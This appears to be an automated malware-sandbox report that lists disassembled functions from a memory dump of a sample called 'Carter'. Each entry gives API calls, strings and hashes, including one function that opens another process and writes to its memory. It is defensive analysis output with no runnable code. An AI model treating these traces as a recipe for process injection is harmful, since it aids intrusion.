Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 0c6747df288172a29c0b41691df3049742d86858d86ead4036302bb83803c3c0
Instruction ID: 564344e1925db18af15cea399264493d2537e59fd244aecee19d7b190273c074
Opcode Fuzzy Hash: 0c6747df288172a29c0b41691df3049742d86858d86ead4036302bb83803c3c0
Instruction Fuzzy Hash: A4F03C3404820CEBDB11AF2AED4C7983FA8B702322F44C258F42A961F0CF704A96DF50

Function 00AEC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00AECA75
CoCreateInstance.OLE32(00B13D3C,00000000,00000001,00B13BAC,?), ref: 00AECA8D

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

CoUninitialize.OLE32 ref: 00AECCFA

Strings

.lnk, xrefs: 00AECA09, 00AECA31, 00AECA3B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 3721bf8f56f233cdd435e59908bbd00c467b0362fc33a2d374989c63717511e1
Instruction ID: 49dd0fd7a6dbfe742484379ca4cbb3c5759464f33d9e35b42db2acecfc6179d7
Opcode Fuzzy Hash: 3721bf8f56f233cdd435e59908bbd00c467b0362fc33a2d374989c63717511e1
Instruction Fuzzy Hash: 7AA13D71104206AFD700EF64C991EAFB7E8EF98754F40491CF155972A2EB70EE49CB92

Function 00A8E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00A91680: _memmove.LIBCMT ref: 00A916DB

__swprintf.LIBCMT ref: 00A8E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A8E431

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 0ab46d452db722d7ffa6caf281c080369e43fa9f78ed37849d850f287057d9cb
Instruction ID: 37942479711b158f61cb7b12ef755238590351cbb19244e760368446a3b3f0c1
Opcode Fuzzy Hash: 0ab46d452db722d7ffa6caf281c080369e43fa9f78ed37849d850f287057d9cb
Instruction Fuzzy Hash: 24917C71608201AFCB18FF24C995D6EB7F8EF95700F45491DF4869B2A1EB20ED44CB92

Function 00AA523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00AA52CD

Part of subcall function 00AB0320: __87except.LIBCMT ref: 00AB035B

Strings

pow, xrefs: 00AA52A5, 00AA52C2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 2e8a4bed2df2f9bbc34ddc615347beafc9833ae363d21cbb613e62b2564f5614
Instruction ID: 4a85bb17f93d5c3c8dfacbb6946367db31a389b70fa773b551c992098251caa5
Opcode Fuzzy Hash: 2e8a4bed2df2f9bbc34ddc615347beafc9833ae363d21cbb613e62b2564f5614
Instruction Fuzzy Hash: 86515E71E0960197CB116734CA517EB3BE8EB42750F208968E4D14B2E7EF758CC89A5A

Function 00AA0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00AA0699
+, xrefs: 00AA0690

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 2d1568b63138cab642ab86432d36323c59a52094211cb7f46dc97b9b5328a0ea
Instruction ID: d6bb90b0fbc38e75e00de96e453c6eab70d0257ee7ac2a8ba323710e111e293f
Opcode Fuzzy Hash: 2d1568b63138cab642ab86432d36323c59a52094211cb7f46dc97b9b5328a0ea
Instruction Fuzzy Hash: E851DF759042569FDF259F68C880AFE7BA4EF6A310F544056F892AB3D0D734AC82DB60

Function 00A9CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A9CFC2
_memmove.LIBCMT ref: 00A9D060
_memset.LIBCMT ref: 00A9D084

Strings

ERCP, xrefs: 00A9CF2D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 984c7fcfae446bced13e55669d1a2785d0955073f90ac4eaffad607dd0bd0682
Instruction ID: cb0ce58888f362a89425ee0c01633b781347693821404ab6d6653ccef62c7558
Opcode Fuzzy Hash: 984c7fcfae446bced13e55669d1a2785d0955073f90ac4eaffad607dd0bd0682
Instruction Fuzzy Hash: 205192B2A007099BDF24CF65C9857AABBF4EF04314F24856EE94BDB291E770D985CB40

Function 00ADA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AD9E4E,?,?,00000034,00000800,?,00000034), ref: 00AE1CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ADA3F7

Part of subcall function 00AE1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AD9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AE1CB0

Part of subcall function 00AE1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00AE1C08
Part of subcall function 00AE1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AD9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AE1C18
Part of subcall function 00AE1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AD9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AE1C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADA464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADA4B1

Strings

@, xrefs: 00ADA4C9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 6d20b0ddedc553adaae1cbc3b6d4d6aa3b86f5f92a7b4f57cd33a1e6eaa0548b
Instruction ID: 8df46b7d15b8830dafbe9486f39d1890e708497e720f446b51878930710d4d3e
Opcode Fuzzy Hash: 6d20b0ddedc553adaae1cbc3b6d4d6aa3b86f5f92a7b4f57cd33a1e6eaa0548b
Instruction Fuzzy Hash: 1E413CB690122CBFDB10DBA4CD85ADEBBB8EF45300F104095FA55B7280DA706E85CBA1

Function 00B079FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B07A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B07A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B07ABE

Strings

SysMonthCal32, xrefs: 00B07A51

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 8672af9de06654fb935ecf039ab424f251fec977abcad8af15664d0ce40d50e9
Instruction ID: 5decc111a196ddda296e25612d6c8070f88a127ceff3e2ecd30e878d77bef3d7
Opcode Fuzzy Hash: 8672af9de06654fb935ecf039ab424f251fec977abcad8af15664d0ce40d50e9
Instruction Fuzzy Hash: FF21AD32A50218AFDF218E54CC82FEE7BA9EB48724F114254FE156B1D0DAB1BC508BA0

Function 00B081B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B0826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B0827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B08284

Strings

msctls_updown32, xrefs: 00B081E9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: cce9c87349da0725f1c255ec5e4fed47044787b0038c9cca856227197d520373
Instruction ID: db76b56287857ada73c0da75d781d06873e8b82a46f8510d3617a88dddb4134a
Opcode Fuzzy Hash: cce9c87349da0725f1c255ec5e4fed47044787b0038c9cca856227197d520373
Instruction Fuzzy Hash: C7217AB5604209AFDB10DF58DC85DA73BEDEB5A3A4B140199FA019B3A1CF71ED11CBA0

Function 00B072D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B07360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B07370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B07395

Strings

Listbox, xrefs: 00B0732D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: d0af6703f998236c4c3d1a068c7ab118e41d03a6125d90e089f5b17f418b6c38
Instruction ID: c2f5a7b1966e3308be9307271c94a67af0105f2085994d787ac6d44990695690
Opcode Fuzzy Hash: d0af6703f998236c4c3d1a068c7ab118e41d03a6125d90e089f5b17f418b6c38
Instruction Fuzzy Hash: B621C532654118BFEF118F54CC85FBF7BAAEB89754F118164FD00971D0CA71AC529BA0

Function 00B07D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B07D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B07DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B07DB9

Strings

msctls_trackbar32, xrefs: 00B07D6E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d670e2ac4dcf5d8d8233edd249b47742740ce7ebc0067010ea429c4574ca17d6
Instruction ID: 21ee117a263115badd329aa015f90e4e5f6404025e5f45eccad4d47a5f871f6f
Opcode Fuzzy Hash: d670e2ac4dcf5d8d8233edd249b47742740ce7ebc0067010ea429c4574ca17d6
Instruction Fuzzy Hash: 00110AB2644209BFDF245F64CC45FE77BE9EF89754F114229FA41A60D0DA71E851CB20

Function 00AFC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AC027A,?), ref: 00AFC6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFC6F9

Strings

GetSystemWow64DirectoryW, xrefs: 00AFC6F3
kernel32.dll, xrefs: 00AFC6E2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: bc4a6176fe92c85b6760bec6609e327e72156f19117341f02fbebc43ee27324d
Instruction ID: 3741b1511da35f30c6b10f61802e57f9dcf6c6d2f70eb3ef6eb0fba06f33f9e9
Opcode Fuzzy Hash: bc4a6176fe92c85b6760bec6609e327e72156f19117341f02fbebc43ee27324d
Instruction Fuzzy Hash: 78E08C3816070AABD7206B6AC948AA27AD8AF04364B908469F985D2220DBB4C8808B10

Function 00A94BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A94AF7,?), ref: 00A94BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A94BCA

Strings

kernel32.dll, xrefs: 00A94BB3
Wow64RevertWow64FsRedirection, xrefs: 00A94BC4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 8bd7dd62bef4d0504cf65728b3d167983e180b6a86ffb28f5998e452a1097731
Instruction ID: 4dcf0a42ed97fdd7dc201ce91b6e83adbf44d294983011580463849d5511497a
Opcode Fuzzy Hash: 8bd7dd62bef4d0504cf65728b3d167983e180b6a86ffb28f5998e452a1097731
Instruction Fuzzy Hash: 24D0C2B0520712DFD7206F30DC08B4672D4AF04340F10CC69E481D6564DEB4C4D0C700

Function 00A94B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A94B44,?,00A949D4,?,?,00A927AF,?,00000001), ref: 00A94B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A94B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 00A94B91
kernel32.dll, xrefs: 00A94B80

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 0e121f28d8d3f1b51339f1427f89897abe1a4d90bffda93ac922c295fc58a493
Instruction ID: a50a7c90f8af16cb21bfa0fd317bd0617fb7b5145e34f26d612efdd5117f9143
Opcode Fuzzy Hash: 0e121f28d8d3f1b51339f1427f89897abe1a4d90bffda93ac922c295fc58a493
Instruction Fuzzy Hash: 43D01270520756DFD7206F35DC18B4676D4AF04355F51C869E485E2564DAB4D4C0C610

Function 00B01447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00B01696), ref: 00B01455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B01467

Strings

advapi32.dll, xrefs: 00B01450
RegDeleteKeyExW, xrefs: 00B01461

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 428d6eb36702fc46ce698849c55b8d8902042bf2de1d144a76acccedc23ddb55
Instruction ID: 0ae3479feffaedd3a493322521c933fa4a89d3c14bd0899f14982815cdeaab40
Opcode Fuzzy Hash: 428d6eb36702fc46ce698849c55b8d8902042bf2de1d144a76acccedc23ddb55
Instruction Fuzzy Hash: 80D0EC315107129FD7205F7588086467AD4AF06395F11C86AA4D5E32A0DAB4D8D08A10

Function 00A955F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A95E3D), ref: 00A955FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A95610

Strings

GetNativeSystemInfo, xrefs: 00A9560A
kernel32.dll, xrefs: 00A955F9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 2c5ff5faa911ff1590bc2e2a4a23235edd6e6c281668e059e0ce8003dca8d673
Instruction ID: b6521e1fc90d4fd276caba1fe76e9068a4f9459adbb400b12b1f9f2640992e72
Opcode Fuzzy Hash: 2c5ff5faa911ff1590bc2e2a4a23235edd6e6c281668e059e0ce8003dca8d673
Instruction Fuzzy Hash: 0CD0C234D30712DFD7206F34C84928676D4AF01391B84C829E481D2160DAB4C4C0C740

Function 00AF97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00AF93DE,?,00B10980), ref: 00AF97D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AF97EA

Strings

kernel32.dll, xrefs: 00AF97D3
GetModuleHandleExW, xrefs: 00AF97E4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 9f27618abca23767b5e7ba8e6a4ebf1a6be0e0c7ba381eb318f10a9c0a4391e5
Instruction ID: b029210898dede58f376e6ef9b985a0b87fd45d25780095c44a0a84b27948f79
Opcode Fuzzy Hash: 9f27618abca23767b5e7ba8e6a4ebf1a6be0e0c7ba381eb318f10a9c0a4391e5
Instruction Fuzzy Hash: 75D0C730420317DFD720AF74D888796B2E4BF04381F50C82AF482EA160EFB4C8C0CA40

Function 00AD7D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d4307764dc75f25d2d1d8a7443e55ae5f1564472936850166d8b82ea6d31ee
